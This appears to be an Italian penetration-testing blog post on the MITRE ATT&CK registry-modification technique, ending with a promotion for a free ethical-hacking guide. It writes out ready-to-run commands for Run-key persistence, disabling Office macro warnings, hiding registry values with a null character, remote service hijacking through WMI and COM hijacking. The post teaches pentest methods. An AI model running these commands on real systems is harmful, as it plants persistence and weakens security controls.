Modifica del Registro: Modify Registry (T1112)
La modifica del registro di Windows rappresenta una tecnica versatile che permette agli attaccanti di manipolare le configurazioni critiche del sistema operativo. Questa capacità si manifesta in due fasi distinte della kill chain: la persistenza (TA0003) per mantenere l'accesso dopo riavvii o modifiche delle credenziali, e l'evasione delle difese (TA0005) per nascondere attività malevole e disabilitare meccanismi di sicurezza.
Il registro può essere modificato tramite utility native come reg.exe o attraverso API Windows integrate in tool di accesso remoto. L'accesso richiede privilegi specifici - alcune chiavi necessitano di diritti amministrativi, mentre altre sono modificabili con privilegi utente standard.
L'impatto di questa tecnica è significativo: 29 gruppi APT documentati la utilizzano attivamente, supportata da 136 software malevoli e osservata in 5 campagne di alto profilo. Le modifiche spaziano dal nascondere payload attraverso chiavi offuscate, all'abilitazione di macro in tutti i prodotti Microsoft Office, fino alla memorizzazione di credenziali in chiaro in memoria.
Durante un penetration test, la manipolazione del registro offre molteplici vettori di attacco. Il comando più basilare utilizza l'utility nativa: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Backdoor" /t REG_SZ /d "C:\malware\payload.exe". Questa modifica garantisce l'esecuzione automatica del payload ad ogni avvio del sistema.
Per scenari più sofisticati, PowerShell offre controllo granulare: New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Office\16.0\Common\Security" -Name "VBAWarnings" -Value 1 -PropertyType DWORD -Force
Questo comando disabilita gli avvisi di sicurezza per le macro VBA, tecnica osservata nell'uso da parte di Gamaredon Group.
Un approccio più evasivo prevede l'uso di chiavi nascoste con caratteri null: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v $([char]0)malware /d "C:\Windows\Temp\update.exe". Queste chiavi risultano invisibili agli strumenti standard di ispezione.
Per test su sistemi remoti, combina WMI con credenziali valide: wmic /node:target-host /user:domain\admin process call create "reg add HKLM\SYSTEM\CurrentControlSet\Services\SecurityService /v ImagePath /t REG_SZ /d C:\Windows\evil.exe"
La persistenza attraverso COM hijacking richiede precisione: prima identifica un CLSID poco utilizzato, poi sostituisci il percorso: reg add "HKLM\Software\Classes\CLSID{GUID}\InprocServer32" /ve /d "C:\malware\comhijack.dll". Questa tecnica evade molti meccanismi di detection focalizzati sulle chiavi Run tradizionali.
Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo